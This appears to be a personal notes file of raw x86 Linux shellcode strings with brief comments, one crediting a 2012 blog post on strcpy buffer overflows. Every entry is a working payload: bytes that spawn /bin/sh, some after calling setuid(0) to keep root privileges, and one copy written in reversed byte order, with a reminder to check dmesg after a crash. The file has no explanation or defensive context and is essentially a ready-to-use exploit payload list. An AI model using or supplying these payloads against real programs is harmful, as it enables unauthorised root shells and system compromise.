# forgot
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80

# https://pointerless.wordpress.com/2012/02/26/strcpy-security-exploit-how-to-easily-buffer-overflow/
\x31\xC0\xB0\x46\x31\xDB\x31\xC9\xCD\x80\xEB\x16\x5B\x31\xC0\x88\x43\x07\x89\x5B\x08\x89\x43\x0C\xB0\x0B\x8D\x4B\x08\x8D\x53\x0C\xCD\x80\xE8\xE5\xFF\xFF\xFF\x2F\x62\x69\x6E\x2F\x73\x68

# setuid(0) + bin/sh
\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x2e\x58\x53\xcd\x80\x31\xd2\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80

# setuid(0) + bin/sh (reversed)
\x80\xcd\xe1\x89\x53\x52\xe3\x89\x6e\x69\x62\x2f\x68\x68\x73\x2f\x2f\x68\x52\x58\x0b\x6a\xd2\x31\x80\xcd\x53\x58\x2e\x6a\x80\xcd\xdb\x31\x58\x17\x6a

# notes
# dmesg | tail -1
